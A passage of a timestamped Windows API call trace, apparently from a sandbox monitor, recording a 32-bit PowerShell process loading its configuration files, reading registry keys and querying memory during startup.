lpOverlapped=0x0) returned 1 [0075.189] GetLastError () returned 0x0 [0075.191] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.191] GetLastError () returned 0x0 [0075.191] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.191] GetLastError () returned 0x0 [0075.191] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.191] GetLastError () returned 0x0 [0075.191] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.191] GetLastError () returned 0x0 [0075.191] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.192] GetLastError () returned 0x0 [0075.192] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.192] GetLastError () returned 0x0 [0075.192] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.192] GetLastError () returned 0x0 [0075.192] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.192] GetLastError () returned 0x0 [0075.192] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.192] GetLastError () returned 0x0 [0075.193] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.193] GetLastError () returned 0x0 [0075.193] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.193] GetLastError () returned 0x0 [0075.193] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.193] GetLastError () returned 0x0 [0075.193] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.193] GetLastError () returned 0x0 [0075.193] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.194] GetLastError () returned 0x0 [0075.194] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.194] GetLastError () returned 0x0 [0075.194] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.194] GetLastError () returned 0x0 [0075.197] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.197] GetLastError () returned 0x0 [0075.197] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.197] GetLastError () returned 0x0 [0075.197] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.197] GetLastError () returned 0x0 [0075.197] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.197] GetLastError () returned 0x0 [0075.198] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.199] GetLastError () returned 0x0 [0075.199] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.199] GetLastError () returned 0x0 [0075.199] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.199] GetLastError () returned 0x0 [0075.199] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1000, lpOverlapped=0x0) returned 1 [0075.199] GetLastError () returned 0x0 [0075.199] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x1b4, lpOverlapped=0x0) returned 1 [0075.199] GetLastError () returned 0x0 [0075.199] ReadFile (in: hFile=0x35c, lpBuffer=0x2b8e1d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xae354, lpOverlapped=0x0 | out: lpBuffer=0x2b8e1d4*, lpNumberOfBytesRead=0xae354*=0x0, lpOverlapped=0x0) returned 1 [0075.199] GetLastError () returned 0x0 [0075.200] CloseHandle (hObject=0x35c) returned 1 [0075.200] GetLastError () returned 0x0 [0075.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xadeb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0075.200] GetLastError () returned 0x0 [0075.200] SetErrorMode (uMode=0x1) returned 0x1 [0075.200] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2baea64 | out: lpFileInformation=0x2baea64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0075.200] GetLastError () returned 0x0 [0075.200] SetErrorMode (uMode=0x1) returned 0x1 [0075.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0075.200] GetLastError () returned 0x0 [0075.200] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae2d8 | out: phkResult=0xae2d8*=0x35c) returned 0x0 [0075.200] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae320, lpData=0x0, lpcbData=0xae31c*=0x0 | out: lpType=0xae320*=0x1, lpData=0x0, lpcbData=0xae31c*=0x56) returned 0x0 [0075.201] RegQueryValueExW (in: hKey=0x35c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae320, lpData=0x54b630, lpcbData=0xae31c*=0x56 | out: lpType=0xae320*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae31c*=0x56) returned 0x0 [0075.201] RegCloseKey (hKey=0x35c) returned 0x0 [0075.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xade80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0075.201] GetLastError () returned 0x0 [0075.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xade14, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0075.201] GetLastError () returned 0x0 [0076.073] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.085] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.088] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.088] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.088] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.089] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.089] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.093] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.126] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.126] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.126] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.126] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.127] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.127] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.128] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.128] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.135] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.143] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.143] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.144] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.144] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.145] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.146] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.147] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.147] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.147] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.148] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.148] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.148] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.148] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.150] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.153] VirtualQuery (in: lpAddress=0xad218, lpBuffer=0xae218, dwLength=0x1c | out: lpBuffer=0xae218*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.153] VirtualQuery (in: lpAddress=0xad218, lpBuffer=0xae218, dwLength=0x1c | out: lpBuffer=0xae218*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.154] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.156] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.202] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.202] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.203] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.213] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0076.213] GetLastError () returned 0xcb [0076.223] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.237] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.237] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.238] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.238] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.239] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.239] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.244] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.246] VirtualQuery (in: lpAddress=0xad214, lpBuffer=0xae214, dwLength=0x1c | out: lpBuffer=0xae214*(BaseAddress=0xad000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.251] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae39c | out: phkResult=0xae39c*=0x358) returned 0x0 [0076.251] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xae404, lpData=0x0, lpcbData=0xae400*=0x0 | out: lpType=0xae404*=0x1, lpData=0x0, lpcbData=0xae400*=0x74) returned 0x0 [0076.251] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xae3e4, lpData=0x0, lpcbData=0xae3e0*=0x0 | out: lpType=0xae3e4*=0x1, lpData=0x0, lpcbData=0xae3e0*=0x74) returned 0x0 [0076.251] RegQueryValueExW (in: hKey=0x358, lpValueName="path", lpReserved=0x0, lpType=0xae3e4, lpData=0x54b630, lpcbData=0xae3e0*=0x74 | out: lpType=0xae3e4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xae3e0*=0x74) returned 0x0 [0076.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xadf64, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0076.252] GetLastError () returned 0xcb [0076.252] SetErrorMode (uMode=0x1) returned 0x1 [0076.252] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xae3e4 | out: lpFileInformation=0xae3e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0076.252] GetLastError () returned 0xcb [0076.252] SetErrorMode (uMode=0x1) returned 0x1 [0076.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xadf58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0076.252] GetLastError () returned 0xcb [0076.252] SetErrorMode (uMode=0x1) returned 0x1 [0076.253] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xae3d8 | out: lpFileInformation=0xae3d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0076.254] GetLastError () returned 0xcb [0076.254] SetErrorMode (uMode=0x1) returned 0x1 [0076.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xadf58, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0076.254] GetLastError () returned 0xcb [0076.254] SetErrorMode (uMode=0x1) returned 0x1 [0076.254] GetFileAttributesExW (in: 